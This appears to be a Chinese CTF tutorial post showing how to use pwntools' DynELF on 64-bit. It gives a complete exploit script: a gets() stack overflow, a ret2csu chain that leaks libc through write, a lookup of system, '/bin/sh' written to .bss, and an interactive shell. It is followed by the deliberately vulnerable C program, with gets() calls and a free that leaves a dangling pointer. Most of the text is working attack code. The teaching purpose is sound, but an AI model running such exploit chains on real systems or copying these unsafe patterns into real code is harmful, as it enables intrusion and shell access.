这几天有同学问我在64位下怎么用这个函数,于是针对同一道题写了个利用dynELF的方法
编译好的程序 http://pan.baidu.com/s/1jImF95O
源码在后面
from pwn import *elf = ELF('./pwn_final')got_write = elf.got['write']
print 'got_write= ' + hex(got_write)
call_get_name_func = 0x400966
print 'call_get_name_func= ' + hex(call_get_name_func)
got_read = elf.got['read']
print "got_read: " + hex(got_read)bss_addr = 0x6020c0pad = 'a'p = process('./pwn_final')
gdb.attach(p)#get system address
def leak(address):
p.recvuntil('please enter your name:')
payload1 = pad * 56
payload1 += p64(0x400d9a)+ p64(0) + p64(1) + p64(got_write) + p64(128) + p64(address) + p64(1) + p64(0x400d80)
payload1 += "\x00"*56
payload1 += p64(call_get_name_func)
p.sendline(payload1)
data = p.recv(128)
print "%#x => %s" % (address, (data or '').encode('hex'))
return datad = DynELF(leak, elf=ELF('./pwn_final'))system_addr = d.lookup('system', 'libc')
print "system_addr=" + hex(system_addr)#write system && /bin/sh
payload2 = "a"*56
payload2 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(got_read) + p64(16) + p64(bss_addr) + p64(0) + p64(0x400d80)
payload2 += "\x00"*56
payload2 += p64(call_get_name_func)
p.sendline(payload2)p.send(p64(system_addr))
p.send("/bin/sh\0")p.recvuntil('name:')# call system
payload3 = "a"*56
payload3 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(0) + p64(0) + p64(bss_addr+8) + p64(0x400d80)
payload3 += "\x00"*56
payload3 += p64(call_get_name_func)
p.sendline(payload3)p.interactive()
源码
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>void print_menu();
void get_name();
void add_paper();
void delete_paper();
void show_paper();
int get_num();
void get_input(char *buffer, int size, int no_should_fill_full);
void gg();char *link_list[10];int main()
{
setbuf(stdout, 0);
setbuf(stdin, 0);
setbuf(stderr, 0);
int choice;
get_name();
while (1){
print_menu();
choice = get_num();
switch (choice){
case 1:
add_paper();
break;
case 2:
delete_paper();
break;
case 3:
show_paper();
break;
default:
return;
}
}
printf("thank you!");
}int get_num()
{
int result;
char input[48];
char *end_ptr; get_input(input, 48, 1);
result = strtol(input, &end_ptr, 0);
if (input == end_ptr){
printf("%s input is not start with number!\n", input);
result = get_num();
}
return result;
}void get_input(char *buffer, int size, int no_should_fill_full)
{
int index = 0;
char *current_location;
int current_input_size;
while (1){
current_location = buffer+index;
current_input_size = fread(buffer+index, 1, 1, stdin);
if (current_input_size <= 0)
break;
if (*current_location == '\n' && no_should_fill_full){
if (index){
*current_location = 0;
return;
}
}else{
index++;
if (index >= size)
break;
}
}
}void get_name()
{
char name[40];
printf("please enter your name:");
gets(name);
}void print_menu()
{
puts("Welcome to use the improved paper management system!");
puts("1 add paper");
puts("2 delete paper");
puts("3 show paper");
}void show_paper()
{
int index;
int length;
printf("Input the index of the paper you want to show(0-9):");
scanf("%d", &index);
if (index < 0 || index > 9)
exit(1);
printf("How long you will enter:");
scanf("%d", &length);
if (length < 0 || length > 2048)
exit(1);
write(stdout, link_list[index], length);
}void add_paper()
{
int index;
int length;
printf("Input the index you want to store(0-9):");
scanf("%d", &index);
if (index < 0 || index > 9)
exit(1);
printf("How long you will enter:");
scanf("%d", &length);
if (length < 0 || length > 2048)
exit(1);
link_list[index] = malloc(length);
if (link_list[index] == NULL)
exit(1);
printf("please enter your content:");
gets(link_list[index]);
printf("add success!\n");
}void delete_paper()
{
int index;
printf("which paper you want to delete,please enter it's index(0-9):");
scanf("%d", &index);
if (index < 0 || index > 9)
exit(1);
free(link_list[index]);
puts("delete success !");
}void gg()
{
char name[40];
read(stdin, name, 40);
}
